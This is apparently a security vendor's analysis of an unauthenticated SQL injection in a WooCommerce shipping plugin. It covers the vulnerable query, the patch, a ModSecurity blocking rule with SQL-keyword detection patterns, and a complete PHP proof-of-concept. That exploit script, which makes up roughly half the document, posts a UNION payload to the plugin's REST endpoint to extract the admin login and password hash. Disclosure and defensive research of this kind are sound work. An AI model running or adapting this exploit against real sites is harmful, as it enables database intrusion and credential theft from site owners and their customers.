Atomic Edge analysis of CVE-2026-54815:
This vulnerability is an unauthenticated SQL injection in the Cargo Shipping Location for WooCommerce plugin. It affects versions up to and including 5.6. The flaw allows attackers with no authentication to extract sensitive information from the database. The CVSS score is 7.5 (HIGH).
The root cause lies in the `cargo_update_shipment_status_callback` method within `/wp-content/plugins/cargo-shipping-location-for-woocommerce/includes/CargoApi/Webhook.php`. In the vulnerable version (5.6), the code at line 82-86 directly interpolated the `$data[‘shipment_id’]` parameter into a SQL query without using parameterized queries or proper escaping. The affected code path is the webhook callback function which processes shipment status updates from the Cargo API. The `$data[‘shipment_id’]` value comes from an HTTP request parameter parsed by the webhook endpoint.
An attacker can exploit this vulnerability by sending a crafted HTTP request to the WordPress REST API endpoint that triggers the cargo shipment status update webhook. The attacker does not need authentication. The specific payload would be sent in the request body as the `shipment_id` parameter. A malicious value like `’ OR 1=1#` would break out of the SQL string context and inject arbitrary SQL commands. The vulnerable query is: `SELECT * FROM {$wpdb->prefix}{$tableName} WHERE meta_key = ‘cslfw_shipping’ AND meta_value LIKE ‘%{$data[‘shipment_id’]}%’`.
The patch in version 5.7 replaces the direct string interpolation with a prepared statement. The diff shows the vulnerable code was changed from the raw string concatenation to using `$wpdb->prepare()` with `%s` placeholders. The `$wpdb->prepare()` function properly escapes the input, preventing SQL injection. Additionally, the patch adds an origin domain validation check in the `cargo_update_shipment_status_permission` method, which restricts which domains can trigger the webhook, providing an additional layer of security.
If exploited, an attacker can extract any data from the WordPress database. This includes user credentials (hashed passwords, usernames, emails), customer order details, API keys, and other sensitive configuration data. The attacker can use UNION-based SQL injection or time-based blind injection techniques to enumerate the database. The impact is severe because it compromises the confidentiality of the entire site database without requiring any prior authentication.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
SecRule REQUEST_URI "@streq /wp-json/cslfw/v1/shipment/update_status" "id:20265481,phase:2,deny,status:403,chain,msg:'CVE-2026-54815 via Cargo API REST endpoint',severity:'CRITICAL',tag:'CVE-2026-54815'"
SecRule ARGS_POST:shipment_id "@rx [\'\-\]|union|select|into|load_file|outfile|sleep|benchmark|substr" "chain"
SecRule REQUEST_METHOD "@streq POST" ""
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-54815 - Cargo Shipping Location for WooCommerce <= 5.6 - Unauthenticated SQL Injection
// Configuration - Change these values
$target_url = 'http://example.com'; // WordPress site URL
// REST API endpoint that triggers the vulnerable webhook callback
$endpoint = $target_url . '/wp-json/cslfw/v1/shipment/update_status';
// Step 1: Craft a malicious payload for SQL injection
// The vulnerable query is:
// SELECT * FROM {$wpdb->prefix}postmeta WHERE meta_key = 'cslfw_shipping' AND meta_value LIKE '%{$data['shipment_id']}%'
// We will inject a UNION-based payload to extract WordPress user credentials
$payload = "' UNION SELECT user_login, user_pass, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM wp_users WHERE user_login='admin' -- ";
// Step 2: Build the request body
$body = array(
'shipment_id' => $payload
);
// Step 3: Initialize cURL and send the request
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $endpoint);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($body));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
'Content-Type: application/x-www-form-urlencoded',
'X-Cargo-Domain: api-v2.cargo.co.il' // Note: In the patched version this header is required; in vulnerable version it may not be enforced
));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
// Step 4: Check for success or error
if ($http_code == 200 && !empty($response)) {
echo "[+] Vulnerability confirmed! Response:n";
echo $response . "n";
echo "[+] Note: The above output may contain the admin password hash if the UNION injection succeeded.n";
} elseif ($http_code == 403) {
echo "[-] Access denied (403). The site may be patched or has a WAF blocking the request.n";
} else {
echo "[-] Received HTTP code $http_code. Response: $responsen";
echo "[+] If the site is unpatched, try with different payload or adjust the endpoint.n";
}
curl_close($ch);
?>
